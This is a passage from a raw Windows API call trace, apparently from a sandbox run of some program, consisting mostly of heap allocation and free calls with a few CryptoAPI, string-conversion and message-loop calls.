lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0207.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0207.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0207.264] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0207.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0207.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0207.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.264] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0207.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0207.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0207.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0207.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0207.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0207.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0207.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0207.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0207.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0207.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0207.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0207.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0207.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0207.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0207.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0207.266] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0207.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0207.267] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0207.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0207.267] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0207.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0207.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.268] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0207.268] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0207.268] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0207.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.269] FreeLibrary (hLibModule=0x74d40000) returned 1 [0207.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.269] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0207.269] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0207.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.269] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0207.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0207.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0207.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0207.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0207.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0207.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0207.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0207.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0207.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0207.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0207.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.271] CloseHandle (hObject=0x1f8) returned 1 [0207.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0207.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0207.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0207.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.272] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0207.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0207.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0207.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0207.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0207.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0207.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0207.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.273] CloseHandle (hObject=0x268) returned 1 [0207.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0207.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0207.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0207.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.277] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0207.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0207.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 